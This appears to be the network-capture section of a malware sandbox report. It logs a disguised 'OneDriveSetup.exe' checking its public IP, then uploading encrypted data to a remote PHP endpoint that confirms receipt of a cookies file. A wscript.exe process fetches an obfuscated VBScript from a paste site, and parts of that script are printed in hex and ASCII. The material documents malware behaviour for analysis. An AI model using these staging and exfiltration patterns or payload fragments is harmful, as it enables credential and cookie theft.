                                                                                                                                                                      Nov 26, 2024 09:33:17.533845901 CET1236INData Raw: 30 4d 38 35 4d 32 77 43 62 37 2f 53 6e 59 69 31 34 64 69 71 76 37 45 76 77 33 69 78 61 39 6f 62 45 44 65 33 42 61 43 32 41 44 67 5a 69 52 35 4d 6f 4d 4e 2f 4a 64 51 44 77 78 44 4c 70 79 6c 48 33 6a 56 79 34 35 46 42 30 51 30 39 37 72 78 39 7a 7a
                                                                                                                                                                      Data Ascii: 0M85M2wCb7/SnYi14diqv7Evw3ixa9obEDe3BaC2ADgZiR5MoMN/JdQDwxDLpylH3jVy45FB0Q097rx9zzwU3siDtk0lLMuC9tctkbihQjUwhlbGbA2xlJIHyClCcJ7HijJZpvugzFhylSkIDlOJprWlYfS3Ni6bGfOnuoFCStddViTxwBCKslKQgOyd8jGFgTowySPc+6a0in4QNbee8cz6hqAKn0TGnbk+U8loVeyNfUCEUkJ
                                                                                                                                                                      Nov 26, 2024 09:33:17.533855915 CET1236INData Raw: 38 63 62 74 63 53 62 71 43 69 34 63 4a 6e 39 73 4d 65 64 57 79 56 42 79 72 37 32 4e 53 43 4a 64 4d 71 6d 72 43 63 4e 30 50 67 71 64 62 43 48 45 59 44 4a 4d 4c 6a 42 52 39 78 39 4e 32 4d 50 33 76 50 6b 31 77 63 4f 69 63 36 79 73 73 44 2b 49 79 37
                                                                                                                                                                      Data Ascii: 8cbtcSbqCi4cJn9sMedWyVByr72NSCJdMqmrCcN0PgqdbCHEYDJMLjBR9x9N2MP3vPk1wcOic6yssD+Iy7asGBe0JKwKsPLUAtwbs7mXuWdTzLjD+rLakET4dDoISXGFY4p0LUrQ7TW71egaG8neStq/bdOKvWI/SolmKn1E7X/XtuqQ4UwlpKAchrcETww2VEl0+a/KmIjKNcez4a3MTQJE3dUztNc50CiN6TBBEQj9RGHNBhL
                                                                                                                                                                      Nov 26, 2024 09:33:17.533869028 CET1236INData Raw: 33 44 50 6c 46 39 43 62 49 65 41 6f 54 33 61 34 54 63 2b 41 63 33 42 70 58 5a 67 74 72 48 46 30 48 4c 43 30 54 63 34 6d 4d 43 49 72 57 37 6d 45 53 79 50 49 71 59 4f 53 52 43 64 7a 30 64 38 4f 70 59 44 73 76 30 42 55 32 42 65 79 66 6b 4e 37 33 74
                                                                                                                                                                      Data Ascii: 3DPlF9CbIeAoT3a4Tc+Ac3BpXZgtrHF0HLC0Tc4mMCIrW7mESyPIqYOSRCdz0d8OpYDsv0BU2BeyfkN73tNeUdTrTSYLt5fR8H5xXACzp8NwAZWpd9u+i7U4hLlw4RR4tBKsALQVPup9ccM54VrZu/FHWtOsdLVhJFIbwjnjEb1YKphjFRJ+rxrPngaPpmZS3bkEy93U2tv0QG4Kt1vCQVLGewAtaQ6mEhPXi/6LR3IiwMz20h/
                                                                                                                                                                      Nov 26, 2024 09:33:17.654259920 CET1236INData Raw: 56 38 47 59 54 39 53 57 52 34 32 59 41 46 37 5a 4a 4d 43 32 68 52 67 4f 59 32 47 51 4b 6d 2f 2b 54 6c 34 57 53 6e 76 6b 67 38 39 4c 30 4a 4b 2b 4b 77 46 69 5a 50 41 67 46 65 68 5a 74 77 67 39 48 6e 77 6b 42 32 34 34 63 67 4d 6a 76 7a 53 4f 47 64
                                                                                                                                                                      Data Ascii: V8GYT9SWR42YAF7ZJMC2hRgOY2GQKm/+Tl4WSnvkg89L0JK+KwFiZPAgFehZtwg9HnwkB244cgMjvzSOGds8hZZbIC4Nc5GGHrWkdHjWh1LffhS6RdKF+jJWhub7CbSHTF5cGOxjJVZjrNDvGotbG7P4j+4yMQPdADyOqje6MQY8x24+ufo6wMzMk6fI/w/AXaO1dFe4mSLpl9AmH6qMyT/tIQpVPT6QyHmhgb5VO70Z3WJ+eAb


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.849712193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:19.490770102 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:20.764657021 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:20 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 79bfc0ce8a2155a7531c49db43d7f2b6
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                                      Nov 26, 2024 09:33:20.783932924 CET127OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Nov 26, 2024 09:33:21.189790010 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:20 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 1644fda5bc6f0b69c3924e0f60f312be
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                                                                                                                                      Nov 26, 2024 09:33:23.551218033 CET127OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Nov 26, 2024 09:33:23.961576939 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:23 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: d5980f5f9a95a34e0fb57db3e77b8589
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.849715193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:25.811736107 CET127OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Nov 26, 2024 09:33:27.177345991 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:26 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 2aee2580a03d1582435ad44d1f37e01b
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.849717193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:28.986321926 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:30.308250904 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:30 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 1e55ee0089debf307cd9acef17e6bb4a
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.849719193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:32.100543976 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:33.366583109 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:33 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 484ff8fb0414b42d42344b01626e6312
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.849721193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:35.265439034 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:36.536338091 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:36 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: e56c9621af90d0bab9834124ab42370d
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.849723193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:38.327847958 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:39.595376015 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:39 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: f18b88167d29cde532932a5c573d8fbd
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.849725193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:41.461373091 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:42.821469069 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:42 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 24ee06c392ccf31ed74b8772bd9002c8
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      9192.168.2.849727193.122.6.168807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:44.661973953 CET151OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                      Host: checkip.dyndns.org
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:46.021223068 CET320INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:45 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 103
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      X-Request-ID: 1fd56e20ed04ef68524c230f0017d1ed
                                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      10192.168.2.84973145.80.158.30807588C:\Windows\SysWOW64\OneDriveSetup.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Nov 26, 2024 09:33:56.344841957 CET144OUTPOST /swsk/P4.php HTTP/1.1
                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                      Host: sws.swpushroller.eu
                                                                                                                                                                      Content-Length: 1432
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Nov 26, 2024 09:33:56.350992918 CET1432OUTData Raw: 4a 32 52 78 57 59 54 6c 4a 67 57 47 64 49 37 57 31 45 45 35 57 50 6b 56 32 68 62 68 4a 4a 59 33 54 77 4f 6e 46 79 66 35 7a 30 6e 4e 76 72 51 72 4b 56 44 6e 37 39 59 75 6c 39 59 6f 77 2b 45 58 66 65 6e 57 57 2b 41 65 6a 32 58 4a 31 73 44 66 59 59
                                                                                                                                                                      Data Ascii: J2RxWYTlJgWGdI7W1EE5WPkV2hbhJJY3TwOnFyf5z0nNvrQrKVDn79Yul9Yow+EXfenWW+Aej2XJ1sDfYYmUsMDpmST+Oow9OJKhMYlWQ1U16sVblH2yiCEq3Zoc7z3vYeANpzvLWP/9y30eOWRvoAJYDf5j9g9/6kEteejNwf4lRvcdya+CJYpHwrk3QMfh3NF1WRTGMA56Fy4HWcL8teKBV3Uh72AKXcInmLvpm2LI8vvfXmS
                                                                                                                                                                      Nov 26, 2024 09:33:57.664963007 CET345INHTTP/1.1 201 Created
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:33:57 GMT
                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                      X-Powered-By: PHP/8.0.30
                                                                                                                                                                      Content-Length: 86
                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 44 61 74 61 20 75 70 6c 6f 61 64 65 64 20 61 6e 64 20 64 65 63 72 79 70 74 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 2c 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 37 39 34 31 2e 74 78 74 22 7d
                                                                                                                                                                      Data Ascii: {"message":"Data uploaded and decrypted successfully.","file_name":"Cookies_7941.txt"}


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.849706104.21.84.674437800C:\Windows\System32\wscript.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-26 08:32:50 UTC173OUTGET /d/MQJcS HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                                      Host: paste.ee
                                                                                                                                                                      2024-11-26 08:32:51 UTC1232INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Tue, 26 Nov 2024 08:32:51 GMT
                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: max-age=2592000
                                                                                                                                                                      strict-transport-security: max-age=63072000
                                                                                                                                                                      x-frame-options: DENY
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                      content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5bLP1F7iKzLA9k5rQqgfWB2PO%2FTlyUn9B5VcDuN3R7xaB1nbpJdCkcWNWZiK4foCUumnrf%2F2Z48tGW7NHIULnn9qJ8r24ouhZ%2Fn40cXYwq65OSTK645DuZBaXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 8e8887bf1a5defa5-EWR
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-11-26 08:32:51 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 38 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 35 37 30 38 35 26 63 77 6e 64 3d 31 38 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 66 37 31 33 35 35 37 61 39 32 63 34 65 64 64 26 74 73 3d 35 32 30 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1983&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1457085&cwnd=187&unsent_bytes=0&cid=5f713557a92c4edd&ts=520&x=0"
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 31 66 37 66 0d 0a 0d 0a 0d 0a 4e 50 61 6b 65 6c 76 57 71 47 78 4b 67 4e 55 20 3d 20 22 69 4c 72 71 4c 4c 5a 68 4b 4a 5a 68 57 4b 4b 22 0d 0a 61 5a 51 4a 7a 55 4c 65 70 7a 69 63 73 4c 66 20 3d 20 22 62 43 49 63 47 68 66 43 69 71 5a 4c 66 7a 78 22 0d 0a 43 4b 4b 6e 4c 71 66 66 5a 6e 6f 57 4b 70 4c 20 3d 20 22 41 4a 70 4e 70 4c 67 47 6f 75 65 4c 49 66 4c 22 0d 0a 69 65 6e 62 6f 41 6d 64 6e 57 67 52 4e 75 5a 20 3d 20 22 61 63 57 62 64 63 55 63 65 4f 6b 68 43 68 6b 22 0d 0a 69 42 6c 6a 63 53 65 4c 6f 4b 57 41 71 50 66 20 3d 20 22 65 72 68 52 71 52 4c 4b 57 63 6e 6b 43 64 68 22 0d 0a 68 65 41 6f 42 69 50 4c 50 4c 50 47 69 4c 69 20 3d 20 22 49 71 57 6b 47 4c 6d 6b 69 57 55 69 6f 55 6a 22 0d 0a 0d 0a 43 47 7a 57 70 6b 75 4a 71 4f 50 70 4c 4f 4b 20 3d 20 22 68 41
                                                                                                                                                                      Data Ascii: 1f7fNPakelvWqGxKgNU = "iLrqLLZhKJZhWKK"aZQJzULepzicsLf = "bCIcGhfCiqZLfzx"CKKnLqffZnoWKpL = "AJpNpLgGoueLIfL"ienboAmdnWgRNuZ = "acWbdcUceOkhChk"iBljcSeLoKWAqPf = "erhRqRLKWcnkCdh"heAoBiPLPLPGiLi = "IqWkGLmkiWUioUj"CGzWpkuJqOPpLOK = "hA
                                                                                                                                                                      2024-11-26 08:32:51 UTC1369INData Raw: 47 69 57 4c 43 65 47 57 6a 47 69 70 4c 6b 41 22 0d 0a 71 55 41 4a 7a 64 4c 41 70 4c 70 61 61 4b 57 20 3d 20 22 4f 65 51 71 7a 69 70 69 49 75 57 43 6c 4c 4c 22 0d 0a 6d 63 6d 4c 4a 4b 65 6f 70 6d 73 6a 66 47 64 20 3d 20 22 67 4c 69 47 65 61 4c 4c 48 43 75 68 7a 6f 50 22 0d 0a 41 6d 61 4b 6b 6f 47 4c 41 69 4f 4e 69 4c 50 20 3d 20 22 55 65 69 50 4c 68 41 69 6a 4c 6f 43 78 6e 4e 22 0d 0a 0d 0a 63 50 63 6f 4c 74 5a 4f 62 50 4c 4c 57 4e 6f 20 3d 20 22 7a 68 70 53 68 76 4b 55 63 69 69 52 4c 55 4e 22 0d 0a 57 66 41 53 49 68 69 67 73 6f 7a 6d 70 4f 6b 20 3d 20 22 41 4b 74 74 72 4c 4c 63 47 63 4b 68 41 75 4b 22 0d 0a 6b 4c 63 55 41 6b 6d 69 57 43 65 42 47 4c 50 20 3d 20 22 78 47 6d 71 4c 4f 43 68 4c 47 63 64 43 5a 57 22 0d 0a 47 55 6d 61 63 47 57 75 78 63 57 47 63
                                                                                                                                                                      Data Ascii: GiWLCeGWjGipLkA"qUAJzdLApLpaaKW = "OeQqzipiIuWClLL"mcmLJKeopmsjfGd = "gLiGeaLLHCuhzoP"AmaKkoGLAiONiLP = "UeiPLhAijLoCxnN"cPcoLtZObPLLWNo = "zhpShvKUciiRLUN"WfASIhigsozmpOk = "AKttrLLcGcKhAuK"kLcUAkmiWCeBGLP = "xGmqLOChLGcdCZW"GUmacGWuxcWGc
